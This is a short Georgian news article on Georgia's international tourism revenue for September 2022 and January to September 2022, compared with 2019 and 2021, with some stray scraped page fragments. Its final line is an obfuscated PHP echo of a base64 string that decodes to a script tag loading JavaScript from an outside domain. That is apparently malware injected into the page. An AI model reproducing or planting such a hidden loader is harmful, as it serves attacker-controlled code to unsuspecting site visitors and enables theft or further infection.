celsiusi
ავერსი საქკაბელი

ტურიზმის ეროვნული ადმინისტრაცია სექტემბრის თვის შემოსავლების სტატისტიკურ მონაცემებს აქვეყნებს.

უწყების ცნობით, 2022 წლის სექტემბრის თვეში საერთაშორისო მოგზაურობიდან მიღებულმა შემოსავალმა პანდემიის შემდეგ უკვე მესამედ გადააჭარბა 2019 წლის მაჩვენებელს. სექტემბრის თვეში შემოსავალმა   375,615,194 აშშ დოლარი შეადგინა, რაც 2019 წლის ანალოგიურ მაჩვენებელს +17.9 პროცენტით აჭარბებს (+56,982,269 აშშ დოლარი).

მონაცემების თანახმად, 2021 წლის სექტემბრის თვესთან შედარებით, მოგზაურობიდან შემოსავლები გაზრდილია 213,752,443 (+132.1 პროცენტი) აშშ დოლარით.

როგორც ტურიზმის ადმინისტრაციაში აღნიშნავენ, ტურისტული ნაკადების გაზრდის შედეგად, 2022 წლის იანვარ-სექტემბრის თვეებში საერთაშორისო მოგზაურობიდან (ტურიზმიდან) საქართველომ 2.5 მილიარდი დოლარის შემოსავალი მიიღო, რაც 2019 წლის მაჩვენებლის 97.5 პროცენტით აღდგენაა.

უწყების ინფორმაციით, 2021 წლის იანვარ-სექტემბრის თვესთან შედარებით, მოგზაურობიდან შემოსავლები გაზრდილია +1,651,528,684 (+190.8 პროცენტი) აშშ დოლარით.

568
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");